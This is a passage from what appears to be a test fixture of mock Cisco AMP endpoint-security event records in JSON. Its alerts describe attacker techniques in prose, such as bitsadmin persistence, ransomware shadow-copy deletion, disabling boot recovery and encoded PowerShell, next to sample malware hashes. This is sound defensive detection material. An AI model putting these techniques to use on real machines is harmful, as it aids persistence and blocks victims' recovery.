IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618750,"start_date":"2021-01-14T10:05:50+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"The Windows Scripting Host (WScript.exe) was used to execute a file with a fake benign extension prior to a scripting extension. This is indicative of an attempt to conceal the malicious intent of the file and to trick the user into opening it.","short_description":"W32.WScriptExecuteFakeExtension.ioc"},"file":{"disposition":"Clean","file_name":"WScript.exe","file_path":"/C:/Windows/System32/WScript.exe","identity":{"sha256":"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0"},"parent":{"disposition":"Clean","identity":{"sha256":"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521138739868158500,"timestamp":1610618750,"timestamp_nanoseconds":868146000,"date":"2021-01-14T10:05:50+00:00","event_type":"Cloud 
IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618750,"start_date":"2021-01-14T10:05:50+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Bitsadmin is a command-line tool that can be used to create, download or upload jobs and monitor their progress. However, it can also be used to maintain persistence and evade checks for usual persistence mechanisms. An attacker with Administrator's rights can use the setnotifycmdline option to create a persistent job and then specify a /Resume option at a later time to execute the job. This mechanism allows the malware to survive reboots since the job is run repeatedly after a system restart. Moreover, Bitsadmin by default downloads files unless the destination server is running IIS with the required server component and /UPLOAD is specified in the command-line. 
While this is not by itself malicious, the command-line needs to be reviewed to ascertain the origin and intent.","short_description":"W32.Bitsadmin.ioc"},"file":{"disposition":"Clean","file_name":"bitsadmin.exe","file_path":"/C:/Windows/System32/bitsadmin.exe","identity":{"sha256":"838670c83e6d1984d0c46e39c196028d292b3a6d2df96183f2f6e408f1a16e00"},"parent":{"disposition":"Clean","identity":{"sha256":"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521138739846959000,"timestamp":1610618750,"timestamp_nanoseconds":846943000,"date":"2021-01-14T10:05:50+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618750,"start_date":"2021-01-14T10:05:50+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Windows Script Host (wscript.exe) was used to execute a JavaScript file inside a zip archive. This attack vector is increasingly being used by ransomware. 
This may not be necessarily malicious but it needs further investigation to determine if the executed JavaScript is indeed malicious.","short_description":"W32.WScriptLaunchedZippedJS.ioc"},"file":{"disposition":"Clean","file_name":"WScript.exe","file_path":"/C:/Windows/System32/WScript.exe","identity":{"sha256":"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0"},"parent":{"disposition":"Clean","identity":{"sha256":"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1494576726048000300,"timestamp":1610618696,"timestamp_nanoseconds":48000000,"date":"2021-01-14T10:04:56+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618696,"start_date":"2021-01-14T10:04:56+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. 
Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.","short_description":"W32.PossibleRansomwareShadowCopyDeletion.ioc"},"file":{"disposition":"Clean","file_name":"vssadmin.exe","file_path":"/C:/windows/system32/vssadmin.exe","identity":{"sha256":"e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10"},"parent":{"disposition":"Clean","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1494576727672000300,"timestamp":1610618689,"timestamp_nanoseconds":672000000,"date":"2021-01-14T10:04:49+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1610618689,"start_date":"2021-01-14T10:04:49+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"The BCDEdit command displays and modifies information about the boot options for Windows Vista and later Windows operating systems. In this case, it was used to disable automatic start up of recovery mode at boot susequent to a failure. 
Malware, such as ransomware, may use this to prevent the user from booting Windows into a safe mode or recovering a previous setting.","short_description":"W32.BCDEditDisableRecovery.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"/C:/windows/system32/cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"},"parent":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1458617561791000300,"timestamp":1610618620,"timestamp_nanoseconds":791000000,"date":"2021-01-14T10:03:40+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618620,"start_date":"2021-01-14T10:03:40+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"A file containing a benign extension prior to the .exe extension was executed. 
This is indicative of suspicious behaviour in an attempt to conceal the malicious intent of the file.","short_description":"W32.FakeExtensionExec.RET"},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","file_path":"/c:/users/rsteadman/downloads/report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"},"parent":{"disposition":"Clean","identity":{"sha256":"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587030380676000,"timestamp":1610618510,"timestamp_nanoseconds":737000000,"date":"2021-01-14T10:01:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"Generic.Malware.WX.9E93D282","detection_id":"6880587021790740668","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","file_name":"p3fci4nu.dll","file_path":"\\\\?\\C:\\Windows\\Temp\\p3fci4nu\\p3fci4nu.dll","identity":{"sha256":"1e5d8b8b8e0d8b74643f7a68430f8dc703290190cc60dcdb4f08c9ecae342b48"},"parent":{"process_id":6708,"disposition":"Clean","file_name":"csc.exe","identity":{"sha256":"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57","sha1":"93cf877f5627e55ec076a656e935042fac39950e","md5":"23ee3d381cfe3b9f6229483e2ce2f9e1"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":460392585524661250,"timestamp":1610618215,"timestamp_nanoseconds":615000000,"date":"2021-01-14T09:56:55+00:00","event_type":"Cloud 
IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618215,"start_date":"2021-01-14T09:56:55+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"The psexec utility was executed as admin.","short_description":"W32.PsexecAsAdmin.ioc"},"file":{"disposition":"Clean","file_name":"PsExec.exe","file_path":"file:///C%3A/share%24/PsExec.exe","identity":{"sha256":"3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef"},"parent":{"disposition":"Clean","identity":{"sha256":"db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508191586038317000,"timestamp":1610611000,"timestamp_nanoseconds":758406329,"date":"2021-01-14T07:56:40+00:00","event_type":"File Fetch 
Completed","event_type_id":553648173,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86","sha1":"5ca4bef8de6def53519d4b22632675bb4c1e470b","md5":"41476df3138717868118d8542cf3d1d6"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":7007136035192884000,"timestamp":1610603346,"timestamp_nanoseconds":403000000,"date":"2021-01-14T05:49:06+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610603346,"start_date":"2021-01-14T05:49:06+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. 
In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. Malware authors may use this technique to bypass antivirus tools.","short_description":"W32.PowershellEncodedBuffer.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"file:///C%3A/Windows/System32/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8"},"parent":{"disposition":"Clean","identity":{"sha256":"a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1515350231459808800,"timestamp":1610584664,"timestamp_nanoseconds":0,"date":"2021-01-14T00:37:44+00:00","event_type":"Threat Detected in Low Prevalence Executable","event_type_id":1107296278,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508191586038317000,"timestamp":1610584030,"timestamp_nanoseconds":579890366,"date":"2021-01-14T00:27:10+00:00","event_type":"File Fetch Completed","event_type_id":553648173,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86","sha1":"5ca4bef8de6def53519d4b22632675bb4c1e470b","md5":"41476df3138717868118d8542cf3d1d6"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583671182384431000,"timestamp":1610582528,"timestamp_nanoseconds":614000000,"date":"2021-01-14T00:02:08+00:00","event_type":"Policy 
Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":695000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411132837046517762","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":691000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411132837046517761","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":684000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.0B965CA8AF-95.SBX.TG","detection_id":"6411132837046517762","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"11179468.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\11179468.exe","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":682000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.0B965CA8AF-95.SBX.TG","detection_id":"6411132837046517761","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960","sha1":"5faebef3bb880489195e80e6656ccf442ff7123b","md5":"84b6f7be5370c1998886214790c6892b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15152998206589,"timestamp":1610534253,"timestamp_nanoseconds":0,"date":"2021-01-13T10:37:33+00:00","event_type":"Vulnerable Application 
